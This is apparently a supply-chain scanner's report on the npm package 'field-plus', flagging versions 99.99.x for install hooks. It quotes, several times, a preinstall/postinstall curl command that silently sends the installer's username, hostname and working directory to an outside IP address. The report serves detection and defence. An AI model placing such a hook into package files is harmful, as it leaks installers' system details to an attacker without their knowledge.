PkgRadar

npm · registry.npmjs.org

field-plus

Install Lifecycle Repeated Payload: preinstall,postinstall="curl -s 'http://3.7.226.146:9000/callback?user=$(whoami)&host=$(hostname)&pwd=$(pwd)&ts=$(date +%s)' > /dev/null 2>&1 || true"

Why PkgRadar flagged 99.99.2

SeveritySignalEvidence
highInstall Lifecycle Repeated Payloadpreinstall,postinstall="curl -s 'http://3.7.226.146:9000/callback?user=$(whoami)&host=$(hostname)&pwd=$(pwd)&ts=$(date +%s)' > /dev/null 2>&1 || true" · package.json
highNew Account With Lifecycle Hookpackage first published 7 day(s) ago, 3 total version(s), has lifecycle hook · package.json
highInstall Lifecycle Suppresses Failurepreinstall="curl -s 'http://3.7.226.146:9000/callback?user=$(whoami)&host=$(hostname)&pwd=$(pwd)&ts=$(date +%s)' > /dev/null 2>&1 || true" · package.json
highInstall Lifecycle Suppresses Failurepostinstall="curl -s 'http://3.7.226.146:9000/callback?user=$(whoami)&host=$(hostname)&pwd=$(pwd)&ts=$(date +%s)' > /dev/null 2>&1 || true" · package.json
mediumSuspicious Publish Context{"package_age_days":7,"publisher":"palanichamy_perumal","burst_same_day":1,"burst_week":1,"lure":null,"version_anomaly":true,"new_account":true}

Scanned versions

VersionVerdictScoreScanned (UTC)
99.99.2High risk852026-06-15
99.99.1High risk1652026-06-15
1.0.0Low risk02026-06-08

Related campaigns

Block this in CI

PkgRadar gates field-plus (and every other dependency) before it merges. One line in your pipeline:

pkgradar gate --ecosystem npm [email protected]